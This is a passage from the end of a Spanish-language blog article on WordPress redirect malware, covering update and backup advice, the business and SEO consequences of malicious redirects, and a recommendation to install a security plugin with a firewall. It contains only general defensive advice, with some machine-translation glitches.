9. También es necesario actualizar todo.R: WordPress, complementos y temas, y realice copias de seguridad periódicas.

¿Cuáles son las consecuencias de los redireccionamientos maliciosos?

Cualquier pirateo tiene un efecto terrible en un sitio web, y el malware de redireccionamiento de WordPress no es diferente. Estas son solo algunas de las formas en que el malware puede afectar negativamente su sitio web y su negocio:

  • Pérdida de ingresosi tiene un sitio de comercio electrónico o un sitio de negocios.
  • Pérdida de valor de marca. debido a la redirección de visitantes a sitios ilegales, fraudulentos o spam.
  • Impacto en el SEOporque Google penaliza los sitios pirateados en sus listas y marca un sitio pirateado para que los visitantes generalmente tengan miedo de visitarlo.
  • Filtración de datos sus visitantes y su sitio.

Hay muchas más formas en que la piratería puede causar daños a la propiedad. El factor crítico es actuar con rapidez y deshacerse del malware lo antes posible.

Producción

El malware de redirección de WordPress aparece en un nuevo avatar de vez en cuando. Los piratas informáticos, y por lo tanto su malware, son cada vez más inteligentes. Los sitios web de WordPress son un tesoro para ellos y la única forma de vencerlos es adelantarse a su juego.

La mejor manera de proteger su sitio web de WordPress es instalar un buen complemento de seguridad que también viene con un firewall incorporado. Esta es, sin duda, la mejor inversión en la seguridad de su sitio web.

Leyendo este artículo:

Gracias por leer: AYUDANTE DE SEO | NICOLA.TOP

¿De cuánta utilidad te ha parecido este contenido?

¡Haz clic en una estrella para puntuarlo!

Promedio de puntuación 5 / 5. Recuento de votos: 543

Hasta ahora, ¡no hay votos!. Sé el primero en puntuar este contenido.

Etiquetas:

También te podría gustar...

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

11 − 1 =